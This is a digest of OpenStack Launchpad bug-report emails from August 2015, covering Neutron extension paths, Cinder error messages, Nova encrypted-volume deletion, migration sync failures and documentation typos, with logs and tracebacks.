[Yahoo-eng-team] [Bug 1486861] [NEW] get_extensions_path fail to remove duplicate path when the path gets appended with a another path

2015-08-20 Thread Ryu Ishimoto
Public bug reported:

get_extensions_path contains logic to eliminate duplicated paths.
However, in the case where the 'api_extensions_path' of config contains
multiple concatenated paths, it treats the concatenated list as one
extension path.

This could be a problem for Neutron services, specifically fwaas, lbaas
and vpnaas.  For these, their extension paths are automatically added in
get_extensions_paths.  If fwaas extension path is also specified in
CONF.api_extensions_path', for example, and if that path is appended
with a different extension path, the duplicated fwaas extension paths
are not recognized as duplicate.

In an offending case, you would have:

paths = ['fw_ext_path', 'fw_ext_path:some_other_path']

and since 'fw_ext_path' != 'fw_ext_path:some_other_path', both
'fw_ext_path' remains, which causes error later on when Firewall
object's 'super' is called since the module containing the Firewall
class definition of Firewall was loaded twice (python doesn't like
this).

In the above scenario, the paths should have been evaluated as:

paths = ['fw_ext_path', 'fw_ext_path', 'some_other_path']

** Affects: neutron
 Importance: Undecided
 Status: New

** Description changed:

  get_extensions_path contains logic to eliminate duplicated paths.
  However, in the case where the 'api_extensions_path' of config contains
  multiple concatenated paths, it treats the concatenated list as one
  extension path.
  
  This could be a problem for Neutron services, specifically fwaas, lbaas
  and vpnaas.  For these, their extension paths are automatically added in
  get_extensions_paths.  If fwaas extension path is also specified in
  CONF.api_extensions_path', for example, and if that path is appended
  with a different extension path, the duplicated fwaas extension paths
  are not recognized as duplicate.
  
  In an offending case, you would have:
  
- paths = ['fw_ext_path', 'fw_ext_path:some_other_path']
+ paths = ['fw_ext_path', 'fw_ext_path:some_other_path']
  
  and since 'fw_ext_path' != 'fw_ext_path:some_other_path', both
  'fw_ext_path' remains, which causes error later on when Firewall
  object's 'super' is called since the module containing the Firewall
  class definition of Firewall was loaded twice (python doesn't like
  this).
  
  In the above scenario, the paths should have been evaluated as:
  
- paths = ['fw_ext_path', 'fw_ext_path', 'some_other_path']
+ paths = ['fw_ext_path', 'fw_ext_path', 'some_other_path']

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1486861

Title:
  get_extensions_path fail to remove duplicate path when the path gets
  appended with a another path

Status in neutron:
  New

Bug description:
  get_extensions_path contains logic to eliminate duplicated paths.
  However, in the case where the 'api_extensions_path' of config
  contains multiple concatenated paths, it treats the concatenated list
  as one extension path.

  This could be a problem for Neutron services, specifically fwaas,
  lbaas and vpnaas.  For these, their extension paths are automatically
  added in get_extensions_paths.  If fwaas extension path is also
  specified in CONF.api_extensions_path', for example, and if that path
  is appended with a different extension path, the duplicated fwaas
  extension paths are not recognized as duplicate.

  In an offending case, you would have:

  paths = ['fw_ext_path', 'fw_ext_path:some_other_path']

  and since 'fw_ext_path' != 'fw_ext_path:some_other_path', both
  'fw_ext_path' remains, which causes error later on when Firewall
  object's 'super' is called since the module containing the Firewall
  class definition of Firewall was loaded twice (python doesn't like
  this).

  In the above scenario, the paths should have been evaluated as:

  paths = ['fw_ext_path', 'fw_ext_path', 'some_other_path']

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1486861/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1486864] [NEW] When I test cinder volume display_name's boundary value, the error message is not clear

2015-08-20 Thread chenying
Public bug reported:

When I test cinder volume display_name's boundary value, the error
message is not clear


When I test cinder volume display_name's boundary value, the error message is 
not clear.

The error message describe it as a server error (HTTP 500) . We do not
know that too long name cause the error from the message.

Should the message describe the error more clearly? Do we need add some
detail to the error messages?


stack@openstack3-T3200:~$ cinder list
+--+---+--+--+-+--+-+
|  ID  |   Status  |
 Display 
Name
 | Size | Volume Type | Bootable | Attached to |
+--+---+--+--+-+--+-+
| cc251b54-8706-4f89-bde5-d484f4393e76 | available | 

 |  1   |  -  |  false   | |
+--+---+--+--+-+--+-+
stack@openstack3-T3200:~$ ^C
stack@openstack3-T3200:~$ ^C
stack@openstack3-T3200:~$ ^C
stack@openstack3-T3200:~$ ^C
stack@openstack3-T3200:~$ ^C
stack@openstack3-T3200:~$ ^C
stack@openstack3-T3200:~$ ^C
stack@openstack3-T3200:~$ cinder rename  cc251b54-8706-4f89-bde5-d484f4393e76 

 
1
 
11
ERROR: The server has either erred or is incapable of performing the requested 
operation. (HTTP 500) (Request-ID: req-9bf9190d-e335-4b28-a926-47a95a38f954)
stack@openstack3-T3200:~$ ^C
stack@openstack3-T3200:~$

** Affects: glance
 Importance: Undecided
 Status: New


** Tags: error messages

** Attachment added: "cinder-api.log"
   
https://bugs.launchpad.net/bugs/1486864/+attachment/4449209/+files/cinder-api.log

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/1486864

Title:
  When I test cinder volume display_name's boundary value, the error
  message

[Yahoo-eng-team] [Bug 1486425] Re: misspelling in the documentation “Compute API v2 (SUPPORTED)”

2015-08-20 Thread cai xiaoxiao
** Project changed: nova => openstack-api-site

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1486425

Title:
  misspelling in the documentation “Compute API v2 (SUPPORTED)”

Status in openstack-api-site:
  Invalid

Bug description:
  http://developer.openstack.org/api-ref-compute-v2.html #1.4.5. Update
  server

   There is a misspelling in the Description of  Request parameter
  “auto_disk_config (Optional)” .

   Now:
   Defines how the server's root disk partition is handled when the server 
is started or resized. Valid value are:

   Change the context as follows:
  Defines how the server's root disk partition is handled when the server 
is started or resized. Valid values are:

To manage notifications about this bug go to:
https://bugs.launchpad.net/openstack-api-site/+bug/1486425/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1486880] [NEW] Can't delete an instance if boot from encryption volume

2015-08-20 Thread Eli Qiao
Public bug reported:

nova configuration:

[ephemeral_storage_encryption]
enabled = True
cipher = aes-xts-plain64
key_size = 512

[default]
# use lvm as images_type
   |
images_type=lvm 
   |
# use that volume group 
   |
# /opt/stack/data/stack-volumes-default-backing-file
   |
images_volume_group=stack-volumes-default   
   |
   
reproduce:

+--+---+++-+--+
root@taget-ThinkStation-P300:/opt/stack/nova# nova boot --security-groups 
default  --key-name testkey --image 57b26b8f-0e8c-4ffd-87b9-0177e6331
b29 --nic net-id=e1d6382e-0e01-4172-9772-19d83058f8f3 --flavor 1 test3

root@taget-ThinkStation-P300:/opt/stack/nova# nova delete test3

root@taget-ThinkStation-P300:/opt/stack/nova# nova list
+--+---+++-+--+
| ID   | Name  | Status | Task State | Power 
State | Networks |
+--+---+++-+--+
| 9ac19e94-06e0-42c9-bbb5-aff44a70959e | test1 | ERROR  | deleting   | NOSTATE  
   |  |
| 6b8c201c-6e83-4eed-a12e-190e2fa9c1a5 | test2 | ERROR  | deleting   | NOSTATE  
   |  |
| d58b12ca-f983-47b8-93d8-a570fe4458d0 | test3 | ERROR  | -  | Shutdown 
   |  |
+--+---+++-+--+


2015-08-20 15:52:22.113 ERROR oslo_messaging.rpc.dispatcher 
[req-5a58977e-04d6-47d4-b962-a98601d400d6 admin admin] Exception during message 
handling: Failed to remove volume(s): (Unexpected error while running command.
Command: sudo nova-rootwrap /etc/nova/rootwrap.conf lvremove -f 
/dev/stack-volumes-default/d58b12ca-f983-47b8-93d8-a570fe4458d0_disk
Exit code: 5
Stdout: u''
Stderr: u'  WARNING: Ignoring duplicate config node: global_filter (seeking 
global_filter)\n  WARNING: Ignoring duplicate config node: global_filter 
(seeking global_filter)\n  Logical volume 
stack-volumes-default/d58b12ca-f983-47b8-93d8-a570fe4458d0_disk is used by 
another device.\n')
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher Traceback (most 
recent call last):
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher   File 
"/usr/local/lib/python2.7/dist-packages/oslo_messaging/rpc/dispatcher.py", line 
142, in _dispatch_and_reply
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher 
executor_callback))
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher   File 
"/usr/local/lib/python2.7/dist-packages/oslo_messaging/rpc/dispatcher.py", line 
186, in _dispatch
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher 
executor_callback)
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher   File 
"/usr/local/lib/python2.7/dist-packages/oslo_messaging/rpc/dispatcher.py", line 
129, in _do_dispatch
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher result = 
func(ctxt, **new_args)
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher   File 
"/opt/stack/nova/nova/exception.py", line 89, in wrapped
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher payload)
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher   File 
"/usr/local/lib/python2.7/dist-packages/oslo_utils/excutils.py", line 119, in 
__exit__
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher 
six.reraise(self.type_, self.value, self.tb)
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher   File 
"/opt/stack/nova/nova/exception.py", line 72, in wrapped
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher return f(self, 
context, *args, **kw)
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher   File 
"/opt/stack/nova/nova/compute/manager.py", line 345, in decorated_function
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher 
LOG.warning(msg, e, instance_uuid=instance_uuid)
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher   File 
"/usr/local/lib/python2.7/dist-packages/oslo_utils/excutils.py", line 119, in 
__exit__
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher 
six.reraise(self.type_, self.value, self.tb)
2015-08-20 15:52:22.113 TRACE oslo_messaging.rpc.dispatcher   File 
"/opt/stack/nova/nova/compute/manager.py", line 316, in decorated_function

** Affects: nova
 Importance: High
 Assignee: Eli

[Yahoo-eng-team] [Bug 1486882] [NEW] ml2 port cross backends extension

2015-08-20 Thread Dong Liu
Public bug reported:

In some scenes using neutron, there are more than one backends of ML2,
such as one is openvswitch and the other is an sdn controller. The ports
in the same network, they may be made up of different ML2 backends. For
openvswitch backends, the tunneling ip of a port is the same as ovs-
agent host's ip. But for an sdn controller backends, there is no
l2-agent, the tunneling ip of a port can not get from host
configuration. So I think, we need extend a new ml2 port attribute to
record the tunnel connection info about ports. Maybe we can named it
"binding:tunnel_connection".

In currently implement, we get the tunneling ip of a port in this way,
port -> binding:host -> agent -> agent configurations -> tunneling_ip.
By using this extension, we could get a tunneling ip in a simple way,
port -> binding:tunnel_connection -> tunneling_ip.

Proposed Change:
* add an extension attribute of port, named "binding:tunnel_connection"
* add a field in ports table
* a little change in the flow of create/update port, maybe in 
openvswitch_ml2_driver and l2pop_driver
* maybe need add some policy rules

** Affects: neutron
 Importance: Undecided
 Assignee: Dong Liu (liudong78)
 Status: New


** Tags: rfe

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1486882

Title:
  ml2 port cross backends extension

Status in neutron:
  New

Bug description:
  In some scenes using neutron, there are more than one backends of ML2,
  such as one is openvswitch and the other is an sdn controller. The
  ports in the same network, they may be made up of different ML2
  backends. For openvswitch backends, the tunneling ip of a port is the
  same as ovs-agent host's ip. But for an sdn controller backends, there
  is no l2-agent, the tunneling ip of a port can not get from host
  configuration. So I think, we need extend a new ml2 port attribute to
  record the tunnel connection info about ports. Maybe we can named it
  "binding:tunnel_connection".

  In currently implement, we get the tunneling ip of a port in this way,
  port -> binding:host -> agent -> agent configurations -> tunneling_ip.
  By using this extension, we could get a tunneling ip in a simple way,
  port -> binding:tunnel_connection -> tunneling_ip.

  Proposed Change:
  * add an extension attribute of port, named "binding:tunnel_connection"
  * add a field in ports table
  * a little change in the flow of create/update port, maybe in 
openvswitch_ml2_driver and l2pop_driver
  * maybe need add some policy rules

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1486882/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1437904] Re: generate_sample.sh uses MODULEPATH environment variable, conflicts with environment-modules

2015-08-20 Thread Lucas Alvares Gomes
** Also affects: ironic
   Importance: Undecided
   Status: New

** Changed in: ironic
 Assignee: (unassigned) => Lucas Alvares Gomes (lucasagomes)

** Changed in: ironic
   Importance: Undecided => Low

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1437904

Title:
  generate_sample.sh uses MODULEPATH environment variable, conflicts
  with environment-modules

Status in Cinder:
  In Progress
Status in Ironic:
  In Progress
Status in OpenStack Compute (nova):
  Fix Released

Bug description:
  The generate_sample.sh script refers to a MODULEPATH variable without
  clearing it first.  On a system using the environment-modules package,
  MODULEPATH is a PATH-like environment variable, which leads
  generate_sample.sh to fail like this:

  No module named
  
/etc/scl/modulefiles:/etc/scl/modulefiles:/usr/share/Modules/modulefiles:/etc/modulefiles:/usr/share/modulefiles

  The solution is to either explicitly clear this variable at the start
  of the script, or use a different name if this is something that is
  expected to be set externally.

To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/1437904/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1486936] [NEW] Migration scripts and db models are not in sync

2015-08-20 Thread Jakub Libosvar
Public bug reported:

Alembic used to not compare foreign keys correctly that caused migration
scripts and db models are out of sync. With new alembic version that
fixed the bug [1] we are gonna fail in Neutron:

Captured traceback:
~~~
Traceback (most recent call last):
  File "neutron/tests/functional/db/test_migrations.py", line 166, in 
test_models_sync
self.fail("Models and migration scripts aren't in sync:\n%s" % msg)
  File 
"/opt/stack/neutron/.tox/functional/lib/python2.7/site-packages/unittest2/case.py",
 line 690, in fail
raise self.failureException(msg)
AssertionError: Models and migration scripts aren't in sync:
[ ( 'remove_fk',
ForeignKeyConstraint(, None, name=u'csnat_l3_agent_bindings_ibfk_3', 
ondelete=u'CASCADE', table=Table('csnat_l3_agent_bindings', 
MetaData(bind=None), Column('router_id', VARCHAR(length=36), 
ForeignKey(u'routers.id'), ForeignKey(u'routers.id'), 
table=, primary_key=True, nullable=False), 
Column('l3_agent_id', VARCHAR(length=36), ForeignKey(u'agents.id'), 
ForeignKey(u'agents.id'), table=, primary_key=True, 
nullable=False), Column('host_id', VARCHAR(length=255), 
table=), Column('csnat_gw_port_id', 
VARCHAR(length=36), ForeignKey(u'ports.id'), ForeignKey(u'ports.id'), 
table=), schema=None))),
  ( 'add_fk',
ForeignKeyConstraint(, None, table=Table('csnat_l3_agent_bindings', 
MetaData(bind=None), Column('router_id', String(length=36), 
ForeignKey('routers.id'), table=, primary_key=True, 
nullable=False), Column('l3_agent_id', String(length=36), 
ForeignKey('agents.id'), table=, primary_key=True, 
nullable=False), Column('host_id', String(length=255), 
table=), Column('csnat_gw_port_id', String(length=36), 
ForeignKey('ports.id'), table=), schema=None))),
  ( 'remove_fk',
ForeignKeyConstraint(, None, name=u'flavorserviceprofilebindings_ibfk_1', 
table=Table('flavorserviceprofilebindings', MetaData(bind=None), 
Column('service_profile_id', VARCHAR(length=36), 
ForeignKey(u'serviceprofiles.id'), ForeignKey(u'serviceprofiles.id'), 
table=, primary_key=True, nullable=False), 
Column('flavor_id', VARCHAR(length=36), ForeignKey(u'flavors.id'), 
ForeignKey(u'flavors.id'), table=, 
primary_key=True, nullable=False), schema=None))),
  ( 'remove_fk',
ForeignKeyConstraint(, None, name=u'flavorserviceprofilebindings_ibfk_2', 
table=Table('flavorserviceprofilebindings', MetaData(bind=None), 
Column('service_profile_id', VARCHAR(length=36), 
ForeignKey(u'serviceprofiles.id'), ForeignKey(u'serviceprofiles.id'), 
table=, primary_key=True, nullable=False), 
Column('flavor_id', VARCHAR(length=36), ForeignKey(u'flavors.id'), 
ForeignKey(u'flavors.id'), table=, 
primary_key=True, nullable=False), schema=None))),
  ( 'add_fk',
ForeignKeyConstraint(, None, ondelete='CASCADE', 
table=Table('flavorserviceprofilebindings', MetaData(bind=None), 
Column('flavor_id', String(length=36), ForeignKey('flavors.id'), 
table=, primary_key=True, nullable=False), 
Column('service_profile_id', String(length=36), 
ForeignKey('serviceprofiles.id'), table=, 
primary_key=True, nullable=False), schema=None))),
  ( 'add_fk',
ForeignKeyConstraint(, None, ondelete='CASCADE', 
table=Table('flavorserviceprofilebindings', MetaData(bind=None), 
Column('flavor_id', String(length=36), ForeignKey('flavors.id'), 
table=, primary_key=True, nullable=False), 
Column('service_profile_id', String(length=36), 
ForeignKey('serviceprofiles.id'), table=, 
primary_key=True, nullable=False), schema=None))),
  ( 'remove_fk',
ForeignKeyConstraint(, None, name=u'qos_bandwidth_limit_rules_ibfk_1', 
ondelete=u'CASCADE', table=Table('qos_bandwidth_limit_rules', 
MetaData(bind=None), Column('id', VARCHAR(length=36), 
table=, primary_key=True, nullable=False), 
Column('qos_policy_id', VARCHAR(length=36), ForeignKey(u'qos_policies.id'), 
ForeignKey(u'qos_policies.id'), table=, 
nullable=False), Column('max_kbps', INTEGER(display_width=11), 
table=), Column('max_burst_kbps', 
INTEGER(display_width=11), table=), schema=None))),
  ( 'add_fk',
ForeignKeyConstraint(, None, table=Table('qos_bandwidth_limit_rules', 
MetaData(bind=None), Column('id', String(length=36), 
table=, primary_key=True, nullable=False, 
default=ColumnDefault( at 0x7f42aa72b1b8>)), 
Column('qos_policy_id', String(length=36), ForeignKey('qos_policies.id'), 
table=, nullable=False), Column('max_kbps', 
Integer(), table=), Column('max_burst_kbps', 
Integer(), table=), schema=None))),
  ( 'remove_fk',
ForeignKeyConstraint(, None, name=u'subnetpoolprefixes_ibfk_1', ondelete=u'CASCADE', 
table=Table('subnetpoolprefixes', MetaData(bind=None), Column('cidr', 
VARCHAR(length=64), table=, primary_key=True, 
nullable=False), Column('subnetpool_id', VARCHAR(length=36), 
ForeignKey(u'subnetpools.id'), ForeignKey(u'subnetpools.id'), 
table=, primary_key=True, nullable=False), schema=None))),
  ( 'add_fk',
ForeignKeyConstra

[Yahoo-eng-team] [Bug 1486077] Re: VPNAAS: dsvm-functional doesn't have installed database backends

2015-08-20 Thread Ann Kamyshnikova
** Changed in: neutron
   Status: Confirmed => Invalid

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1486077

Title:
  VPNAAS: dsvm-functional doesn't have installed database backends

Status in neutron:
  Invalid

Bug description:
  During the work on implementing ModelMigrationsSyncTest for vpnaas it
  came up that dsvm-functional in gate does not have mysql and
  postgresql backends installed -
  http://paste.openstack.org/show/420551/.

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1486077/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1476591] Re: volume in_use after VM has terminated

2015-08-20 Thread AMRITANSHU
Its  not the bug as I see once  yoy have openstack environment working
properly then you can create a vm attach a volume but when you are
deleting a vm you must detach volume then delete the vm .

As you delete vm  root volume willbe deleted according to functionality
but the volume attached will not be dtached as you had not detached it.

You have to manually detach it by the voulmes tab by going to that
volume.

** Changed in: nova
 Assignee: (unassigned) => AMRITANSHU (amritgeo)

** Changed in: nova
   Status: New => Opinion

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1476591

Title:
  volume in_use after VM has terminated

Status in Cinder:
  New
Status in OpenStack Compute (nova):
  Opinion

Bug description:
  Running the Tempest test
  
tempest.scenario.test_volume_boot_pattern.TestVolumeBootPatternV2.test_volume_boot_pattern
  with our CI system runs into a timing issue in the interaction between
  Nova and Cinder.

  Essentially on the Cinder side the volume status of the volume  used
  in the test is 'in_use' for several seconds _after_ the tests VM has
  already been terminated and cleaned up, including the umounting of the
  given volume on the Nova side. As Cinder sees the volume is still
  'in_use' it calls the Nova API to perform the snapshot deletion but
  since the volume has already been umounted on the Nova side the
  resulting qemu-img operation triggered by Nova runs into a 'no such
  file or directory' error.

  The following log excerpts show this issue. Please refer to the given
  time stamps (all components run in a devstack in the same machine so
  times should be comparable):

  1) Cinder log (please note i added two debug lines printing the volume status 
data in this snippet that are not part of the upstream driver):
  2015-07-21 08:14:10.163 DEBUG cinder.volume.drivers.remotefs 
[req-6dae7608-e1f4-43af-ac8e-22d6aa7d72c9 
tempest-TestVolumeBootPatternV2-966547300] Deleting snapshot 
ca09f072-c736-41ac-b6f3-7a137b0ee072: _delete_s
  napshot /opt/stack/cinder/cinder/volume/drivers/remotefs.py:915
  2015-07-21 08:14:10.164 DEBUG cinder.volume.drivers.remotefs 
[req-6dae7608-e1f4-43af-ac8e-22d6aa7d72c9 
tempest-TestVolumeBootPatternV2-966547300] Initial snapshot deletion volume 
status is in-use _delete_snapsho
  t /opt/stack/cinder/cinder/volume/drivers/remotefs.py:918
  2015-07-21 08:14:10.420 DEBUG cinder.volume.drivers.remotefs 
[req-6dae7608-e1f4-43af-ac8e-22d6aa7d72c9 
tempest-TestVolumeBootPatternV2-966547300] snapshot_file for this snap is: 
volume-7f4a5711-9f2c-4aa7-a6af-c6
  ccf476702d.ca09f072-c736-41ac-b6f3-7a137b0ee072 _delete_snapshot 
/opt/stack/cinder/cinder/volume/drivers/remotefs.py:941
  2015-07-21 08:14:10.420 DEBUG oslo_concurrency.processutils 
[req-6dae7608-e1f4-43af-ac8e-22d6aa7d72c9 
tempest-TestVolumeBootPatternV2-966547300] Running cmd (subprocess): sudo 
cinder-rootwrap /etc/cinder/rootwra
  p.conf env LC_ALL=C qemu-img info 
/opt/stack/data/cinder/mnt/38effaab97f9ee27ecb78121f511fa07/volume-7f4a5711-9f2c-4aa7-a6af-c6ccf476702d.ca09f072-c736-41ac-b6f3-7a137b0ee072
 execute /usr/local/lib/python2.7/dis
  t-packages/oslo_concurrency/processutils.py:230
  2015-07-21 08:14:11.549 DEBUG oslo_concurrency.processutils 
[req-6dae7608-e1f4-43af-ac8e-22d6aa7d72c9 
tempest-TestVolumeBootPatternV2-966547300] CMD "sudo cinder-rootwrap 
/etc/cinder/rootwrap.conf env LC_ALL=C q
  emu-img info 
/opt/stack/data/cinder/mnt/38effaab97f9ee27ecb78121f511fa07/volume-7f4a5711-9f2c-4aa7-a6af-c6ccf476702d.ca09f072-c736-41ac-b6f3-7a137b0ee072"
 returned: 0 in 1.129s execute /usr/local/lib/python2.7/d
  ist-packages/oslo_concurrency/processutils.py:260
  2015-07-21 08:14:11.700 DEBUG cinder.volume.drivers.remotefs 
[req-6dae7608-e1f4-43af-ac8e-22d6aa7d72c9 
tempest-TestVolumeBootPatternV2-966547300] In delete_snapshot, volume status is 
in-use _delete_snapshot /opt
  /stack/cinder/cinder/volume/drivers/remotefs.py:956

  2) Nova log:
  2015-07-21 08:14:05.153 INFO nova.compute.manager 
[req-e9bea12a-88ef-4f08-a320-d6e8e3b21228 
tempest-TestVolumeBootPatternV2-1465284168 
tempest-TestVolumeBootPatternV2-966547300] [instance: adbe1fa4-7136-4d29-91d
  0-5772dbf4900d] Terminating instance  
  2015-07-21 08:14:05.167 6183 INFO nova.virt.libvirt.driver [-] [instance: 
adbe1fa4-7136-4d29-91d0-5772dbf4900d] Instance destroyed successfully.  
  2015-07-21 08:14:05.167 DEBUG nova.virt.libvirt.vif 
[req-e9bea12a-88ef-4f08-a320-d6e8e3b21228 
tempest-TestVolumeBootPatternV2-1465284168 
tempest-TestVolumeBootPatternV2-966547300] vif_type=bridge instance=Instan
  
ce(access_ip_v4=None,access_ip_v6=None,architecture=None,auto_disk_config=False,availability_zone=None,cell_name=None,cleaned=False,config_drive='True',created_at=2015-07-21T08:13:32Z,default_ephemeral_device=No
  
ne,default_swap_device=None,deleted=False,deleted_at=None,disable_terminate=False,displ

[Yahoo-eng-team] [Bug 1486805] Re: mistake in the documentation

2015-08-20 Thread venkatamahesh
** Project changed: nova => openstack-api-site

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1486805

Title:
  mistake in the documentation

Status in openstack-api-site:
  New

Bug description:
  1. http://developer.openstack.org/api-ref-compute-v2.html #1.4.5.
  Update server

   There is a mistake in the Description of Request parameter
  “auto_disk_config (Optional)” .

   Now:
   True. The root partition expands to encompass all available virtual disk.

   Change the context as follows:
  True. The root partition expands to encompass all available virtual disks.

  we can refer to the other places in the documentation :
     Lists information for all available flavors.
     Lists all available software deployments.

  2. http://developer.openstack.org/api-ref-compute-v2.html#deleteServer
   There is a mistake in the Asynchronous postconditions.

   Now:
   The server is deleted from the list of servers returned by an API calls.

   Change the context as follows:
  The server is deleted from the list of servers returned by an API call.

  it should be [call] not [calls] here.

To manage notifications about this bug go to:
https://bugs.launchpad.net/openstack-api-site/+bug/1486805/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1476591] Re: volume in_use after VM has terminated

2015-08-20 Thread Silvan Kaiser
Hi Amritanshu!
I'm answering the questions from the top down.

Q: Please specify the openstack setup procedure and release used for this 
deployment
A: I used a clean VM (ubuntu trusty) with devstack setup. The Cinder storage is 
using the Quobyte driver and the according storage system (which is running on 
a different machine). On this setup i did run the tempest volume tests.
If you require specific files from the setup please tell.

Q: Please specify the steps so that we can reproduce it and work on the same.
A: The reproduction might require a Quobyte installation currently i do not 
have a working alternativer setup but creation of that should be possible. The 
issue arises in general Cinder & Nova Code during Tempest test clean up and at 
the Quobyte driver simply calls Cinder/Nova-LibVirt functions.

Q: You have to manually detach it by the voulmes tab by going to that volume.
A: The process does not involve manual steps as this is an automated test from 
the Tempest test suite. If you find there's a detach operation missing maybe 
that's needed to go in there somewhere (we would have to find out / clarify 
where exactly).

** Changed in: nova
   Status: Opinion => New

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1476591

Title:
  volume in_use after VM has terminated

Status in Cinder:
  New
Status in OpenStack Compute (nova):
  New

Bug description:
  Running the Tempest test
  
tempest.scenario.test_volume_boot_pattern.TestVolumeBootPatternV2.test_volume_boot_pattern
  with our CI system runs into a timing issue in the interaction between
  Nova and Cinder.

  Essentially on the Cinder side the volume status of the volume  used
  in the test is 'in_use' for several seconds _after_ the tests VM has
  already been terminated and cleaned up, including the umounting of the
  given volume on the Nova side. As Cinder sees the volume is still
  'in_use' it calls the Nova API to perform the snapshot deletion but
  since the volume has already been umounted on the Nova side the
  resulting qemu-img operation triggered by Nova runs into a 'no such
  file or directory' error.

  The following log excerpts show this issue. Please refer to the given
  time stamps (all components run in a devstack in the same machine so
  times should be comparable):

  1) Cinder log (please note i added two debug lines printing the volume status 
data in this snippet that are not part of the upstream driver):
  2015-07-21 08:14:10.163 DEBUG cinder.volume.drivers.remotefs 
[req-6dae7608-e1f4-43af-ac8e-22d6aa7d72c9 
tempest-TestVolumeBootPatternV2-966547300] Deleting snapshot 
ca09f072-c736-41ac-b6f3-7a137b0ee072: _delete_s
  napshot /opt/stack/cinder/cinder/volume/drivers/remotefs.py:915
  2015-07-21 08:14:10.164 DEBUG cinder.volume.drivers.remotefs 
[req-6dae7608-e1f4-43af-ac8e-22d6aa7d72c9 
tempest-TestVolumeBootPatternV2-966547300] Initial snapshot deletion volume 
status is in-use _delete_snapsho
  t /opt/stack/cinder/cinder/volume/drivers/remotefs.py:918
  2015-07-21 08:14:10.420 DEBUG cinder.volume.drivers.remotefs 
[req-6dae7608-e1f4-43af-ac8e-22d6aa7d72c9 
tempest-TestVolumeBootPatternV2-966547300] snapshot_file for this snap is: 
volume-7f4a5711-9f2c-4aa7-a6af-c6
  ccf476702d.ca09f072-c736-41ac-b6f3-7a137b0ee072 _delete_snapshot 
/opt/stack/cinder/cinder/volume/drivers/remotefs.py:941
  2015-07-21 08:14:10.420 DEBUG oslo_concurrency.processutils 
[req-6dae7608-e1f4-43af-ac8e-22d6aa7d72c9 
tempest-TestVolumeBootPatternV2-966547300] Running cmd (subprocess): sudo 
cinder-rootwrap /etc/cinder/rootwra
  p.conf env LC_ALL=C qemu-img info 
/opt/stack/data/cinder/mnt/38effaab97f9ee27ecb78121f511fa07/volume-7f4a5711-9f2c-4aa7-a6af-c6ccf476702d.ca09f072-c736-41ac-b6f3-7a137b0ee072
 execute /usr/local/lib/python2.7/dis
  t-packages/oslo_concurrency/processutils.py:230
  2015-07-21 08:14:11.549 DEBUG oslo_concurrency.processutils 
[req-6dae7608-e1f4-43af-ac8e-22d6aa7d72c9 
